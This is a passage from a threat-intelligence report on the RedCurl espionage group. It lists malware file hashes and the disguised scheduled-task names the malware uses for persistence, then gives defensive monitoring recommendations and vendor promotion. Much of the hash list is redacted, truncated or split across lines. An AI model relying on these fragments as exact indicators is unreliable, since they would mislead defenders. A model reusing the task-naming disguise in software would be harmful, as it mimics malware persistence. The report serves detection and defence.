T1573.001: Symmetric
Cryptography
The cybercriminals used the AES algorithm to encrypt network
connections.
T1090.003:
Multi-hop Proxy
The cybercriminals used chains of compromised routers
to communicate with cloud storage providers.
T1020: Automated
T1537: Transfer Data
to Cloud Account
The cybercriminals used cloud storage devices to copy data.
The above comparative analysis of the RedCurl, CloudAtlas, and
RedOctober campaigns shows that, despite similarities between
the attacks, it is impossible to assert unequivocally whether
RedCurl is a continuation of the
campaigns or linked to them in any way.
35
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
IoCs
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 571cba0332280827b067612f04f43f2b
SHA1: c2614da1b29293505fd71589641adfc5161a1146
acbca
Encoded
RedCurl.FSA
MD5: cc9460fa24872509eae5bd6496858202
SHA256: c9ad954dea815ef6fd7013b3ba2f476b65d13a9907dabc7ab3b13fee72c
46ad6
Encoded
RedCurl.C1
SHA1: 6d488096fae4916dab8a17c43eb2ce8cee340616
SHA256: 3a962d97ca4fde28feae125d1460e25df33cfb47a6ddc60a2c12e0060
244547e
Encoded
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 8292f62c1583a79021ad5e7654b33fd3
SHA1: d13feeac312e7a43340ef3ef6df28b4f53209016
SHA256: 4705ebee308ace8f17f333fb394eafa85893def238fc1383895c0bacf
fcda032
Encoded
RedCurl.FSA
36
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: 6a5eef605d8cfccf00f636ca7021e590
SHA1: b5922c93e70840125617ba36a3651413c641e558
SHA256: 402d12e5ec939db389bf5713af5c90b25fc2f1ba7f653ec9454140f32fc
a2f7b
Encoded
RedCurl.C1
SHA1: dd4392b4c06a24b615d7672a90d4c0bf43425efe
c92d
Encoded
RedCurl.C2
MD5: 5f6d12a1f6a58f0abab1e214c5fcc872
SHA1: 126fb5c821e4d9e3cd22fb4076c718e6c7048537
SHA256: 125b81f93be005d9709af4c95bc4b4449aeb3c2af36730c3441a26744
4cfa8cd
Encoded
RedCurl.FSA
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 6272b59b5090f45639a5a26ad8f98365
SHA1: fc6d0882cafc128ea44dfb82a8612c28246457ba
SHA256: 55327d92ee6f11faec64a6dc9a5088940458610b05671a766a4874b
32ca30035
Encoded
RedCurl.FSA
MD5: 9691daebab79c6ab48adac73bda0a84a
SHA1: 4d068039476fe2e5a883d08d3b16827ab2442a1f
SHA256: af4983c6a86105d1b7f1c73e1ce7ea4710d5f5c7dbdf14d87132279346da
d96f
RedCurl.
InitialDropper
SHA1: d80dea264dc6621223b3f91564c71699f4d20d6b
SHA256: 8353529d98b32d45a403128f03a3e8f6cc21f9dfb9362b9898eb0e4d
c3bd807f
RedCurl.FSA_light
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 2375e40fb45efecc4e162449ea1fb479
SHA1: a7a170ea16b4fb567da7656f9690977129bf022b
SHA256: abb51a52a9bb5342ed2f1acb9f4c802d7333f8f493b2970dc9767e5bc
608514a
RedCurl.Dropper
MD5: 2abdcca9bdfa79e22f49af21082422f1
SHA1: 9921aaba1bc6ac7c2002db7b395d2d6fce232b05
SHA256: 684f231c7ec0fde283d559cad729acdadcda8644b8054a40bda2f078
ed777e79
Encrypted
RedCurl.FSA
MD5: aa57b416608949c5dcf9f496832f317e
SHA1: 6e4a0fc3b901a1eb2d7dad87e08bbe8176df27ca
SHA256: fe03a9a0a2df2e8580a990b7dbd7e6915e1bd56a3716cdc686b39a97
3ac945b7
Encrypted
RedCurl.C1
37
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: 5294c19eea035302410711b718cd623e
SHA1: a32edf29e9dd334d938e7d43bf5f23e5e2e1379b
SHA256: 14c02e489f2593f5a4f13dba6ea4675e4fe233081a90fa2deeb1e7afcc5
b7cfb
Encrypted
RedCurl.C2
MD5: e18e269de42033065baeaf3e1bba0cf7
SHA1: 2bc166ae7482ab1fc164a82333d52f562e3ebcf2
SHA256: ba7278b2d7087d2cdd0af9ca298edbab5e134d31ac33da7378c28032
b2894b69
RedCurl.Dropper
MD5: aa625ac2df396bb478eee6a875083dc6
SHA1: 1e799d277564f5e2dc02765d67baa2b001eb3c14
SHA256: 9bfda16318e0a1875f2c527196e6ecec8b818663bbfd26b40ae2c3
10aa234834
Encrypted
RedCurl.FSA
MD5: fd3f1940afc2b429bc56c0b55f356944
SHA1: 9544021eca90f2b61c00b1f3d964eada46c4069f
SHA256: dac83995f978a8917bca8577ddcbb43efdb9889db82d112dd547e0
d52d277866
Encrypted
RedCurl.C1
MD5: 8048a791b5946dd68a1fc8ca5358ec75
SHA1: 0536f010e53e68844875d635b9af896b98b7b7f9
421b
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 40ef07b3221d9846d892c42d10b7220e
SHA1: e8c2b3f99fccd983fb8245d9523687e6f3d9e7c0
9d184f
RedCurl.Dropper
MD5: f215b71695e8f5f4ddf50466e853cc42
SHA1: 37bd8f99b48d3c4ba2d961a2845500d49f6d0b67
SHA256: d8e25f8abb73f4c14c80d65fcb26cefca276ddbf184145be5dca2ed553
c784b2
Encrypted
RedCurl.FSA
MD5:313ede2578a6d8ab5a1b558a78759085
SHA1:eab481f339cd5f64bc91c7718ccdc7997bb717d6
SHA256: c12e73c1422138b496c4632115a69acfad3a3603979bf78f6f54ed7a2da
ce22b
Encrypted
RedCurl.C1
MD5: 3becc75bfd9c8d3fd19b8486ba980ce4
SHA256: 20bde46e621f2c18402d9f32ea8021525b8f0af27977210c0fde74c6c0
117d36
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
38
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: b096449ed0ca654ae166bc141bd22335
SHA1: c9f2ed153f54faab782fde4d7b99b8a76165b43b
0641e1
RedCurl.Dropper
MD5: da62ada98b1b0c6ecb5d47eab1e9519e
SHA1: 3e8594a9ae1b779502dad2783a32be3708121ee6
SHA256: 67ac0312de78b8f3d8cb3202cf109a19593407cba10d53d24e21750b7
7463b7a
Encrypted
RedCurl.FSA
MD5: b1479513a24a37e4e3b0c38d6535cf21
SHA1: 6a3132c2d2663c70cbf91c3b6e412de6a9b2000f
SHA256: 9f73b30c0c8fca4950ac7de0497fec3104fb747df07550125987e546ec
Encrypted
RedCurl.C1
MD5: b2e91b4b714adbe826dbb5692db78453
SHA1: 8a7dc93cb358dfa3ede7ebe6215200541a5d2350
SHA256: 0ab7a99db824bc6435f6c0b9b8228398e50c572620f40e392e4
afdf163133274
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 98e9ab41cc8756fb15edaf879200d414
SHA1: 18f5abb55e372c59d35665b125a3facd39406d0a
SHA256: 47ea69945bbeb18bce1c0446f00cc6b2ed29836238a8c76b1078fc4f6
e2a08d2
RedCurl.Dropper
MD5: 484bb302a2ca940f562be418e1b67eee
SHA1: 1d4b869153121c47b97901dfe9b0a595d3a41b65
SHA256: 3cae215d0fb22e64034a7c5364a5498d31a8409ec46621809855c05
7c88c6f91
Encrypted
RedCurl.FSA
MD5: 948ccaba625e5073730cef8c0d21f894
SHA1: a31c0046f06c9274adc322363045b7a6e01ccc9e
873638d
Encrypted
RedCurl.C1
MD5: edab30e2d72f62f9056398e85d31195d
SHA1: af8e1aa9e57b2dae655b6b2a0c3b3ec15878a57d
SHA256: 1c1608cb2e48e68cd961994484de3aed68b35b1c5f118040f0336a5eb
a9d50af
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
39
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: dcf33e6f22ed5a24fb8e2c507770f278
SHA256: 82e21853c392a31ec1751e58bd98abb50ecfb19afc7d6bb6e9e4f0cc45
38eda5
RedCurl.Dropper
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 3E36E2AF206B6C41847161C58C777554
SHA1: 679A71094CD62D342CFD189F178E7D8CDDC5D0C1
SHA256: 6EA64629B17DA6923AD58680CE769B545E9A75E3FC7B86CB9756B
1D3E85D7A2D
RedCurl.Dropper
MD5 f2fe7442b9017dcfe146ebea85a631e7
SHa1 a608509665e6f07e407c636fdafc9a364df9ba89
SHA256 0f3e14d24ef31e6acdd491a5406818a4526741e04d080b6c2d28547ec
9fb42d5
Encrypted
RedCurl.FSA
MD5: 8734bfe951847a5b577f01088c5cc803
SHA1: 6ed0375d527cc8855f435777f68d4924cf24957b
SHA256: fe1dbf4420d247b7e55b9a313b83d7ec9833efa1e1c7d169aeeb7a5ef3
2c8c09
Encrypted
RedCurl.C1
MD5: 2c100f7835627ab7acb5cb58dfd04b8d
62ed6
Encrypted
RedCurl.C2
SHA1: 08d429f8ba3218b9442f6c00d33988fe8d924cab
5edf376904
RedCurl.Dropper
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 973579883D19696C3B4286E74D8FA062
SHA1: 3580DD6B213C6EFB86F6DFCD9A39EF850C47E503
SHA256: 4DCB6F2DC401095B730FCFA50098E05C407C1AF2376AC2483EE1D
813D6524CBE
RedCurl.Dropper
SHA1: b3dea7c6d31b4e1acf07befe2b937e545faa1172
SHA256: 65c95bbd3cd3bd6b7bdbd05394a4cdb7fee2b2d43953bfbf23bf
5fbd29412736
Encrypted
RedCurl.FSA
SHA1: 276b97c5805d932e19b5156e93d3054ca2403c58
SHA256: 9ea46aa8cc4c26000b83ef445e296938fd81f2a322f7cde8a0220b4f
20c0d973
Encrypted
RedCurl.C1
40
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: 8b16f157d0f07819ada6896fed86d5d3
SHA256: 90583fa223fb3c5a86169e0f672266bbda3ddc8a4cc59662f58be00b
313b0c72
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: dcc0098c95e58a6bf95f0cfe70a4f476
SHA1: 5e950dc125984ce19136d99dd87baaf943c3a8b7
SHA256: 86b4e9a8a20ee49ae49df514ad768b12d4ebb042bb749eee19e6736a
68554bac
RedCurl.Dropper
MD5: 78965056e42a035de01a7fc420d9bb97
SHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290
SHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b
615a6373
Encrypted
RedCurl.FSA
MD5: 5e29db24d44311463fdeea35aa6cd61c
SHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352
SHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace87050032
9a5a56
Encrypted
RedCurl.C1
MD5: b2ac2fad617b22f11b19bd24c50c4e8c
SHA1: 3e684d2e3043c57b960343319c094ef7318bea5f
SHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1f
e4fc3
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 78965056e42a035de01a7fc420d9bb97
SHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290
SHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b
615a6373
Encrypted
RedCurl.FSA
MD5: 5e29db24d44311463fdeea35aa6cd61c
SHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352
SHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace87050032
9a5a56
Encrypted
RedCurl.C1
MD5: b2ac2fad617b22f11b19bd24c50c4e8c
SHA1: 3e684d2e3043c57b960343319c094ef7318bea5f
SHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1f
e4fc3
Encrypted
RedCurl.C2
41
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: e2d981da14863ab47345eb8534c8e3a1
SHA1: 5bea907808d30369f60e7902a1b4906ded699897
SHA256: 18e43031ee4ed50a773780e32e354ae5222988f675e3d51a1329df4
f84d61578
RedCurl.Dropper
MD5: e315ea0ad5aa2556e4b0f68afe989acc
SHA1: 3606849f0d6ec485579a8c6c136707e6c85ec473
SHA256: 57441a44625855340c0bfdf1b6f5e69a520e4e3041064e3322b219a1b
73cbbc2
Encrypted
RedCurl.FSA
MD5: 04055917ce47645427b4f4ca84fe1e51
SHA1: 21f23c97bb3d008baf5b276a847ede51efef8cc3
SHA256: e75d03e6db53644e9d24838dd1c70d9f8687661fc850e6154dcd6
6ebb0671333
Encrypted
RedCurl.C1
MD5: dc8544751117ef6c0d320fbcd9e4a2db
SHA1: f2e3d9700b0303cc1f57a7802b36420e79b25ce6
SHA256: cd2f32ed533d4edba9874736f8eb3431042ec5af0674740b83c93af62
3f5b0b8
Encrypted
RedCurl.C2
MD5: e7d27d0d682d8bb56b29b34e3eda03d7
SHA1: ef8b6293111eb3fd2244307d95e8278b31778a78
SHA256: c7df2c96c74e712cb3d33264f0f80140471b281c6fa7bbad313b74da048
d828a
RedCurl.Dropper
MD5: f2e33472eb55f22a5c1eb1dd2dfdca8c
SHA1: 1e82f8862e2d0884d20fbcd96d9d751c5924403e
ccdc
Encrypted
RedCurl.FSA
MD5: acb1882549b7556259bf7f25c7fbf077
SHA1: aad0f1ce8cae3b0dd12f5a70f1ef495fd7269a1a
SHA256: 9d405df68f1f017be0743a4db478d266b11cb804b4a6f5219f1caa67fe
866a78
Encrypted
RedCurl.C1
MD5: 7c0ec47f4b6acb597954b8f6befe33f1
SHA1: 1644b15cdda74505f5a06ccbe1c5615db11f2558
5225ba3
Encrypted
RedCurl.C2
MD5: 0bd8e164a95532bb2817bf2e056cc0f1
SHA1: 403f8b0f9bb5e8a80651743ab274c63fa930c3bf
SHA256: 3e143dfbc61ca565569cb5d997588da702f5b2a7293902695cab5237
4cb4c7bf
RedCurl.Dropper
SHA1: 1eb09787262722d8684db5c008066c9b69b15b94
SHA256: 1d5a6fbc0514ae637cafd327aead8c01e000a8d9c80bd0be8faa21217
b9ec412
Encrypted
RedCurl.FSA
MD5: 774e762e8546c569328a1d550cd9479e
SHA1: 0e8fe9dcfd88c89632f813227ecd9299455bec86
SHA256: b4c8079dbe2a1b3d04f9656df1d47eaeecf3dbc4cb8eceaf71a8fbba54
7cd2df
Encrypted
RedCurl.C1
42
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: 313a8aad53478e141011934a3ead2ed6
SHA1: f47a3e557813139b0202bb7e1bef7d1e5564f3d6
SHA256: f5958605365175b6eb9da3544778b8e100cbebb3d2e1f9788d25df71d
5394d2d
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
SHA1: 3c34b35c9bf5e73cb702d6c2f7cbd96d2ee2f5cd
SHA256: e77c4990b3863e789efc1b064a8387e7c71e74bc5f960045f64b5b1da
dbfc213
RedCurl.Dropper
MD5: e3ac036fe4ac10813914b1cca52d1de5
SHA1: 8711b71fda59b5b75176b436d2498d57c59d1389
SHA256: b0b9fb1aaabf4a45e9f8dada75e7fee04aa61ead9432340bb9c5f92161
a6372d
Encrypted
RedCurl.FSA
MD5: 36fb611a076da404f61ef667a12cac55
SHA1: 36de37b3117e1f8e9df4749b2de886aef968511f
SHA256: 3a4ab011bb5c5c24852ab21abe635f2969ac9452e354d22da1cbb793
b63c3278
Encrypted
RedCurl.C1
MD5: 868d9d2bd0d11843e5a381b1873508cb
SHA1: b0eb8d3d80e503708a19a891b5ba11a9b55e54f6
SHA256: b24955832b9fb277166535531773f52374f54bb7d6645687e4e03d0ce
a460f6d
Encrypted
RedCurl.C2
MD5: fe8dceacfbf2dc4d874359ef6fca2de1
a518ca
RedCurl.Dropper
MD5: 25f4359b5201295ac56dcf234800a3d9
SHA1: 11c62b38f40faa6961be9ec2df8af1344c672233
SHA256: 88caafdca263af4b7f6d6b952b16093b059cbcdb13ef26eabf096659d
cb96e48
Encrypted
RedCurl.FSA
MD5: e31512cb72b081f51e214f7d2496c0e1
SHA1: 3a4ba61af6cbc627dd450ed74e58cdec3aee076d
c4a6d83e
Encrypted
RedCurl.C1
SHA1: 46e50da34773d0960dbedfb4598762b233725bbd
SHA256: 4bd0943312cbf137da2286efd6e1892235d0cafe2b7472509c80cf5a2
Encrypted
RedCurl.C2
43
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 5f49e06a5a03f67eb476b66ab461f116
SHA1: 0d0938ce0b6a2150ba3e02d231b9dafd5aeea69f
SHA256: 4bef36d87e4a7f3e0f4fedacedb0f914c173e28718a413106de9972e2e2
9cebf
RedCurl.Dropper
MD5: e2ce59cd2a36a5dfa2bc3ab8a8d9eca8
SHA1: 25ec727de33683062e1e4afa11269fcaf61ea2b9
7459c4
Encrypted
RedCurl.FSA
MD5: 73340f09829b923c5a8c3468e166e49d
SHA1: 2991873bd471a288379b2ddc3d03fa9a415e0eac
SHA256: 2c10d7a916fddae6baaece992a1a12e2c76fa9da82e322b68aadd31c85
dd48c7
Encrypted
RedCurl.C1
MD5: c45df36255f57e31aeabd723e03bbd08
SHA1: 4cb87f3d29b83620c96b67e4531120063438af01
SHA256: 5aab509c14e9a6a63c4ca318d681be252bc406018d50f0b7b204bfb
b63d73652
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 5e694e86bf0bc3e55f5a65d6684e1631
SHA1: c47522b3923173881f52dddacd48acd88359f23a
2cce
RedCurl.Dropper
MD5: 2a5365dc4344c258196dfdba5d783db0
SHA1: 0782da50a5ddf8551adc5957896a0406abc8ad16
SHA256: d90d3d5c18bb8b9ba31be1a82fdbc7df4d37e7d05873e18843229
e27b0501991
Encrypted
RedCurl.FSA
MD5: 2d484bd4ea9e4d3853f0e91e062d980b
SHA256: 7c99c0a7882da8d88c175ce4a34d2cac80bcdb7a2fa5f3815b0188554
6b9e205
Encrypted
RedCurl.C1
44
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: a1fa93c9650044ed71bbda18bdfe5f61
598af
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: c47104f9c669454e7b48d2c717d949da
SHA1: edfc60a54fda49fa43a6e0d8ed5a14e181278617
c2ad43
RedCurl.Dropper
MD5: 808f2e36caaa5c2e88c29cf0e634e2bb
SHA1: 84051063cf4e11cef9ec8c3ce81d4a2a4b36348f
466c5
Encrypted
RedCurl.FSA
MD5: 1c3a60db0b174963dd01953c55804411
SHA1: ccc8176dd2cc0d7831d153f9d9399b4712e6da5b
9f86aa
Encrypted
RedCurl.C1
MD5: 04a1c0704b549581e3029634ea2ecf07
SHA1: 6343000188465aa07d92639f812f7fccf0ed56cf
SHA256: 95d95e0df11486a4ac675dadad541848435327a1f9eed331bba808179
821d740
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 47db515e537b88184f450bd352cb7e6e
SHA1: d9d6001515073a6fda28958f5990091733662e17
1ebe1
RedCurl.Dropper
SHA1: 2dd90d341d80edef4fbee339c856caec3001056f
SHA256: e29ccda7507adc5479d4413c9486b2217b4c2e415be5f03259540359
d7b2c6aa
Encrypted
RedCurl.FSA
MD5: 24b5427d7e147de61d6b2b535aa1028f
SHA256: cfabe2d5bee9367fd7a8a6882c3ab0fbd897520e44ce67cc40d60b02
f8f19d04
Encrypted
RedCurl.C1
MD5: a3d0c95a34ebf46b313c26ea7ca79288
SHA1: 7bef4606d73bd77b8d1d5b6b7a08f8869190d49d
SHA256: f66c8d0fdc5d436a5c284d36d36cfe3cc7e1f7efcca5a7274a58bf1cd5f
fd4b8
Encrypted
RedCurl.C2
45
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 95a5fba13ae88e43f460c9fba7328670
SHA1: 47dc335be7c9c114c6061fd72b8b76cf87e63e72
SHA256: 10558d1be5fcaf108240ebe1f8a53ecb0c4acc82e7f3ab6885b00dc102
9b7fcf
Encrypted
RedCurl.FSA
SHA1: 2f7581666f5a7ccc6afa3a1ac7cc1994f78a7ae2
SHA256: 4f984cf3589903887f0b221b1db5ef7c47e7bce9568a5a8070aea8f42f
b31fe9
Encrypted
RedCurl.C1
MD5: d3de39a4482cfa3f051f418a10e1994e
SHA1: 91210c365e4ceaaef5aeb595f30c53d573a27943
SHA256: d4a7943abb06b42b731c22bb8fd5c49fb714dcac11cbeca1e81c5781f62
Encrypted
RedCurl.C2
MD5: 082f4383801b79279e82b718c672a452
SHA1: ce178c77370e9654c810c5a67fa55d2e0bd0a7f4
SHA256: 24b6308438b081c77338a917b907d57a3f5519b6008167e6c1b3d9d02
cd4a38a
Encrypted
RedCurl.FSA
MD5: a75871000b944b87fa0aee37cb20facf
SHA1: c25194f9c547a85a9ce7a7dd752427b33a16c0e7
SHA256: 15417751a35972f2e54123e97440a8acf24c26bbd9d8521cc88fb7498
b54b567
Encrypted
RedCurl.C1
MD5: e000ab9fa0bf5e01ba353bba14fac8f1
SHA1: 51d60a7da40c11e37b31462e6b78f909e84d85f4
SHA256: 22d9328d4e9da55db54576ab52eb6837c20bf034e045e5f078b00e7
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 12ec7e6876dc86f158f448ebfba9e0eb
SHA1: 464a8c086279357ad41e15180ae0d4881cf48717
SHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900
59dc04d
RedCurl.Dropper
46
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
MD5: 65167ef2ac035b8205e657a31b3c8ee5
SHA1: aa21dc970461c653bd24e75a1440f6893bbaf747
SHA256: df621643336947405b6f0d66927730a51267c39b6978ac732f9dc7941
7fba464
Encrypted
RedCurl.FSA
MD5: cda007d68777e193827ab87cb00c4726
SHA1: 25a3d8aacc4bb40fd3a42ab7fa80c180324ac90b
SHA256: 7476fe7f7750f5fcc2eeb66b3626377957f0a1e92d621cb4db2352b659
5722c7
Encrypted
RedCurl.C1
MD5: 12ec7e6876dc86f158f448ebfba9e0eb
SHA1: 464a8c086279357ad41e15180ae0d4881cf48717
SHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900
59dc04d
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
SHA1: 8fc49c58aeb70943da579e6985b64d78a56f6958
SHA256: 61f981e15bae9b0643262f16a124cb490f51d0040267d41e17c6b83f2b9
d437c
RedCurl.Dropper
MD5: 4071bf66e07cd4a7feadd316f91cfd56
SHA1: b9c762e7e65b4cdcac054fa424b2219f8ecf3b78
SHA256: edfa39f931ec45f71a4b6cc6b473f046a384f1f05637a1eb0a5a4c1608c
044cf
Encrypted
RedCurl.FSA
MD5: db602ed8ba5890f162dc3546847646b1
SHA1: 7fee558c6d6668e67e75dd94a2d7609c287ec756
556d7
Encrypted
RedCurl.C1
MD5: f04cf464ddd719dce94640cc4b6e866d
SHA1: 19d0afc92e3e98e3ed5e1db9aed21da791245e8d
SHA256: 660f8efbf3f5e408092ead5933bcb80bd220d91d3233ec162ebf725fd
0bc82f6
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 979eaebd1510996ab834e3471fdaab5b
SHA1: 23e813e43dc67b50a7d00f76223c1fc56fe1abbe
SHA256: bba4e8a3f2a05d5bb543b765c7964e33ba02e8a895bfc64976f6ae9
412a99464
RedCurl.Dropper
47
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
SHA1: b1a79cce4a75e46830f52fedc67b2a3209eb78bb
87da4
Encrypted
RedCurl.FSA
MD5: b5d0f72dc1bda1727d88c51cf16ee8c1
SHA256: cf2b96927b6f3bf3bb169200e047b6337a256012f350b6f5b5b8bec37
100f951
Encrypted
RedCurl.C1
MD5: 662493e155284d654d61e2923efeeec4
SHA1: 09bd864389edcc7585a42950e32619c31b1ac34a
SHA256: 2c69410c0d45561d286b67f7848811b551dd659d62fef7cb1711875d3c1c
0a3a
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
48
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
49
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Microsoft Windows Check Updates Status
CheckTN1
CheckU3
CheckTN1
DiskDiagnosticResolverSrv
NetworkStateChangeTaskProv
ControlLocalTimeSvc
50
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
CleanupTemporaryStateTask
WsSwapAssessmentTask
SynaMonAppService
NetworkStateChangeTaskProv
CalibrationLoaderTask
CalibrationLoaderTask
MsCtfMonitorFramework
Base64(%USERNAME%)
SysprepGeneralizeDrivers_ + Base64(%USERNAME%)
RegisterDeviceSettingsChange_ + Base64(%USERNAME%)
Base64(%USERNAME%)
Microsoft-Windows-DiskDiagnosticDataCollector_ + Base64(%USERNAME%)
MicrosoftSharePointProducts_ + Base64(%USERNAME%)
ProcessMemoryDiagnosticEvents_ + Base64(%USERNAME%)
Scheduled_ + Base64(%USERNAME%)
BitLockerMDMpolicyRefresh_ + Base64(%USERNAME%)
51
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
SvcRestartTaskNetworkService
NetworkStateChangeTask_ + Base64(%USERNAME%)
MDMMaintenenceTask_ + Base64(%USERNAME%)
Registration_ + Base64(%USERNAME%)
SpaceManagerService_ + Base64(%USERNAME%)
Base64(%USERNAME%)
MusUx_UpdateInterval_ + Base64(%USERNAME%)
MsCtfMonitor_ + Base64(%USERNAME%)
RegIdleBackup_ + Base64(%USERNAME%)
WindowsActionDialog_ + Base64(%USERNAME%)
RMSRightsPolicyTemplateManagement_ + Base64(%USERNAME%)
MDMMaintenenceTask_ + Base64(%USERNAME%)
52
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Appendix 2. Examples
of FSA, C1, and C2
53
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
54
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
55
© GROUP−IB
RECOMMENDATIONS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Recommendations
Each analytical report issued by Group-IB’s Threat Intelligence
& Attribution team contains recommendations on how to pre-
vent attacks conducted by the group(s) analyzed. In this case,
Group-IB experts recommend taking the following steps:
1. Analyze phishing emails detected by security tools and users.
2. Monitor applications (including command line arguments) that
are often used by cybercriminals during initial compromise
3. Restrict PowerShell execution on systems where it is unnec-
essary. Monitor executable scripts and pay close attention
to powershell.exe processes with long Base64-encoded strings
in arguments.
4. Monitor arguments with which rundll32.exe is launched.
5. Monitor and verify tasks created in the scheduler.
6. Block access to cloud storage devices that are unnecessary.
7.
Group-IB Threat
Intelligence and
Research Centers
• Europe
• Russia
• Middle East
•
is a global leader in high-delity
Threat Hunting and Intelligence, best-in-class
fraud prevention solutions, and high-prole
cyber investigations.
• Globally distributed cybercrime
monitoring infrastructure
• Digital Forensics & Malware Analysis Laboratory
• High-Tech Crime Investigations
• CERT-GIB: 24/7 monitoring centers and
Computer Emergency Response Team
OSCE
INTERPOL
AND EUROPOL
Partner and active collaborator
in global investigations
Recommended by the
OSCE as a cybersecurity
solutions provider
Ranked among the Top 10 cybersecurity
companies in the APAC region
according to APAC CIO Outlook
APAC
TOP 10
AMSTERDAM
MOSCOW
DUBAI
SINGAPORE
Threat Intelligence
& Attribution
System for analyzing and
attributing cyberattacks, threat
hunting, and protecting network
infrastructure based on data
relating to adversary tactics,
tools, and activity
Fraud Hunting
Platform
Client-side digital identity
protection and fraud prevention
in real time
Threat Hunting
Framework
Adversary-centric detection
of targeted attacks and
unknown threats for IT and
OT environments
Atmosphere: Cloud
Email Protection
Patented email security
technology that blocks,
detonates and hunts for the
most advanced email threats
Digital Risk
Protection
AI-driven platform for digital risk
Group-IB’s
technologies
and innovations
Group-IB’s experience in performing successful global
investigations with state-of-the-art threat intelligence
and detecting cybercriminals at every stage of attack
preparation has been fused into an ecosystem of highly
sophisticated software and hardware solutions
designed to monitor, identify, and prevent cyber threats.
Our mission is to protect our clients in cyberspace at all
costs using innovative technologies and services.
FORRESTER
FROST & SULLIVAN
IDCGARTNER
FORRESTER
FROST & SULLIVAN
KUPPINGERCOLE
ANALYSTS AG
KUPPINGERCOLE
ANALYSTS AG
Group-IB’s technologies
are recognized by the
world’s leading research
companies:
GARTNER
NEW
Intelligence-
driven services
Group-IB’s technological leadership and
R&D capabilities are built on the company’s 18 years
of hands-on experience in performing successful
cybercrime investigations worldwide and the 70,000
hours of cybersecurity incident response accumulated
in our leading forensic laboratory and CERT-GIB.
• High-tech crimes
